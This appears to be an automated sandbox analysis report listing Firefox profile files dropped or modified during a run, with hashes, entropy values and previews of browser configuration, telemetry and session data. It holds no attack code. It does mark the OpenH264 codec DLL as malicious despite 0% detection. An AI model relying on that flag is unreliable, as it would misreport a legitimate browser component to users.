                                                                                                                                                                                                                            Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):24
                                                                                                                                                                                                                            Entropy (8bit):3.91829583405449
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                                                            MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                                                            SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                                                            SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                                                            SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\store.json.mozlz4 (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                                            MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                            SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                            SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                            SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\store.json.mozlz4.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                                            MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                            SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                            SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                            SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extensions.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36830
                                                                                                                                                                                                                            Entropy (8bit):5.185849187264327
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:0I4nvfwkXU4y6f4k4oB4a4IPN84I4/4uw4J424qF4g:0NPa45
                                                                                                                                                                                                                            MD5:6C3BE83A836C11F0781A28C5C276611E
                                                                                                                                                                                                                            SHA1:826B42D0E82A04A59A96150A478A9C63172B7506
                                                                                                                                                                                                                            SHA-256:FB38EDAD3460F248967331080F6C398248DBC215D16E4BAB3E31CE260E1176B7
                                                                                                                                                                                                                            SHA-512:EA67C9DF14F00A17C3044EE63DAFA9E7FA9A4B0F04A4D98CC19F2C9794D6D9A215323E13AD354AF60DE1F31288C565EE4455CFE3B9B8F2877DEF20A4151D4921
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{fc425cd7-ddd8-48c7-9e11-c0b9f650e5fa}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extensions.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36830
                                                                                                                                                                                                                            Entropy (8bit):5.185849187264327
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:0I4nvfwkXU4y6f4k4oB4a4IPN84I4/4uw4J424qF4g:0NPa45
                                                                                                                                                                                                                            MD5:6C3BE83A836C11F0781A28C5C276611E
                                                                                                                                                                                                                            SHA1:826B42D0E82A04A59A96150A478A9C63172B7506
                                                                                                                                                                                                                            SHA-256:FB38EDAD3460F248967331080F6C398248DBC215D16E4BAB3E31CE260E1176B7
                                                                                                                                                                                                                            SHA-512:EA67C9DF14F00A17C3044EE63DAFA9E7FA9A4B0F04A4D98CC19F2C9794D6D9A215323E13AD354AF60DE1F31288C565EE4455CFE3B9B8F2877DEF20A4151D4921
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{fc425cd7-ddd8-48c7-9e11-c0b9f650e5fa}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1021904
                                                                                                                                                                                                                            Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                            MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                            SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                            SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                            SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1021904
                                                                                                                                                                                                                            Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
                                                                                                                                                                                                                            MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                            SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                            SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                            SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                            Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                            MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                            SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                            SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                            SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                            Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
                                                                                                                                                                                                                            MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                            SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                            SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                            SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs-1.js

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13820
                                                                                                                                                                                                                            Entropy (8bit):5.4688112061148795
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:NzQneRdIYbBp6nnmUzaXk6aRYFKWPakG5RDNBw8dw9mSl:NzeeYmUsZcDDrw/w0
                                                                                                                                                                                                                            MD5:1CA447A61AA0D814F390B81B8CC1C654
                                                                                                                                                                                                                            SHA1:052EE7D9E3CD96B69C1274E870DE8B9761E8B36F
                                                                                                                                                                                                                            SHA-256:C3BFE40BB54D1B6BDFF5CB37EE28E203DF9717412467A3E4F99737403D2A15B0
                                                                                                                                                                                                                            SHA-512:81CE4E4B73C0A539C03D1966ACD8D7F2815E7E7BEA009F94E2215C030F8FFB4B1E7C3DDFAA9F01FD2982AA101C9172C6A6CD2FAC2B0F83DE4609C68FF10BDD40
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1735041557);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173504

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13820
                                                                                                                                                                                                                            Entropy (8bit):5.4688112061148795
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:NzQneRdIYbBp6nnmUzaXk6aRYFKWPakG5RDNBw8dw9mSl:NzeeYmUsZcDDrw/w0
                                                                                                                                                                                                                            MD5:1CA447A61AA0D814F390B81B8CC1C654
                                                                                                                                                                                                                            SHA1:052EE7D9E3CD96B69C1274E870DE8B9761E8B36F
                                                                                                                                                                                                                            SHA-256:C3BFE40BB54D1B6BDFF5CB37EE28E203DF9717412467A3E4F99737403D2A15B0
                                                                                                                                                                                                                            SHA-512:81CE4E4B73C0A539C03D1966ACD8D7F2815E7E7BEA009F94E2215C030F8FFB4B1E7C3DDFAA9F01FD2982AA101C9172C6A6CD2FAC2B0F83DE4609C68FF10BDD40
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.background-update-timer", 1735041557);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1735041557);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 173504

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\6165fe96-fe43-428a-abd1-7cbaf718f174 (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):493
                                                                                                                                                                                                                            Entropy (8bit):4.953684393667825
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:YZFgA8nAD4IVHlW8cOlZGV1AQIYzvZcyBuLZYXNs7:YhR4SlCOlZGV1AQIWZcy6ZYXNs7
                                                                                                                                                                                                                            MD5:9A345F4038A86D48A3AE569030C9CF7C
                                                                                                                                                                                                                            SHA1:0B37BE2B349152AE3C96CD2CC94C92ECDEAABC08
                                                                                                                                                                                                                            SHA-256:13AA6EBA602799C7760D98F3273553D8A13D4351C1232332AEE7AFCCBE7BEAFA
                                                                                                                                                                                                                            SHA-512:D878C48A0F39E302E80A2CBD9A1FA718007E97882132A79658C12B10F45D2BBB67B32A0AC7F9CD8C2DE1559B27403B568C76CA8570F0192EAC604921EFD95854
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"type":"health","id":"6165fe96-fe43-428a-abd1-7cbaf718f174","creationDate":"2024-12-24T11:59:48.196Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"os":{"name":"WINNT","version":"10.0"},"reason":"immediate","sendFailure":{"eUnreachable":1}},"clientId":"965729a8-84e4-4cad-a75d-ac8181902c4b"}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\6165fe96-fe43-428a-abd1-7cbaf718f174.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):493
                                                                                                                                                                                                                            Entropy (8bit):4.953684393667825
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:YZFgA8nAD4IVHlW8cOlZGV1AQIYzvZcyBuLZYXNs7:YhR4SlCOlZGV1AQIWZcy6ZYXNs7
                                                                                                                                                                                                                            MD5:9A345F4038A86D48A3AE569030C9CF7C
                                                                                                                                                                                                                            SHA1:0B37BE2B349152AE3C96CD2CC94C92ECDEAABC08
                                                                                                                                                                                                                            SHA-256:13AA6EBA602799C7760D98F3273553D8A13D4351C1232332AEE7AFCCBE7BEAFA
                                                                                                                                                                                                                            SHA-512:D878C48A0F39E302E80A2CBD9A1FA718007E97882132A79658C12B10F45D2BBB67B32A0AC7F9CD8C2DE1559B27403B568C76CA8570F0192EAC604921EFD95854
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"type":"health","id":"6165fe96-fe43-428a-abd1-7cbaf718f174","creationDate":"2024-12-24T11:59:48.196Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"os":{"name":"WINNT","version":"10.0"},"reason":"immediate","sendFailure":{"eUnreachable":1}},"clientId":"965729a8-84e4-4cad-a75d-ac8181902c4b"}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.json (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\recovery.baklz4 (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 5861 bytes
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1569
                                                                                                                                                                                                                            Entropy (8bit):6.327242562111723
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:v+USUGlcAxSfLXnIgM/pnxQwRlszT5sCIdDqUVOQ3eHVY+qo+pTUkamhujJJX/q9:GUpOxWsnR6fuoQ3epfyTUk4JJNNIHiw
                                                                                                                                                                                                                            MD5:198799F6B4D29F63589B4D249BCFFBB7
                                                                                                                                                                                                                            SHA1:FCF79E85120CAEA49BE124CCE74D579DA7915212
                                                                                                                                                                                                                            SHA-256:E83D9D6975ABC2E8EA516D489AF5D1D4E49167D514DE192ED096F6D42704F43A
                                                                                                                                                                                                                            SHA-512:979CE09C191DCCBC958375A2843EB0339A9ED8FB027BE91C310F2257066D49F1B86A9F9BF937E4A6446D66A1CF0D14EB9ED104D7DC233BA2A30EAC24D17A35D2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://youtube.com/account?=.....rs.googl%...v3/signin/challenge/pwd","title[.C..cacheKey":0,"ID":6,"docshellUU...D"{e252ac56-98d0-46aa-996f-8fe9c09d7eb9}","resultPrincipalURI":null,"hasUserInteracte...true,"triggering8.p_base64z..\"3\":{}^...docIdentifier":7,"persistK..+}],"lastAccessed":1735041567329,"hidden":false,"searchMode...userContextId...attribut...{},"index":1...questedI..p0,"imag....chrome://global/skin/icons/warning.svg"..aselect...,"_closedTZ.@],"_...C..`GroupCF..":-1,"busy...t...Flags":2167541758....dth":1164,"height":891,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace9...890d5fc3-0c4c-4214-a93a-b8e730a022a1","zD..1...Wm..l........j..:....1":{..iUpdate...30,"startTim..P26918...centCrash..B0},".....Dcook.. hoc..."addons.mozilla.org","valu...A4a32081674711da8c0af7e7198f4a549116c7011a74775b8dc2ae1b10b859df4","path":"/","na..a"taarI|.Recure...,`.Donly..fexpiry...47671,"originA...

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\recovery.jsonlz4 (copy)

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 5861 bytes
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1569
                                                                                                                                                                                                                            Entropy (8bit):6.327242562111723
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:v+USUGlcAxSfLXnIgM/pnxQwRlszT5sCIdDqUVOQ3eHVY+qo+pTUkamhujJJX/q9:GUpOxWsnR6fuoQ3epfyTUk4JJNNIHiw
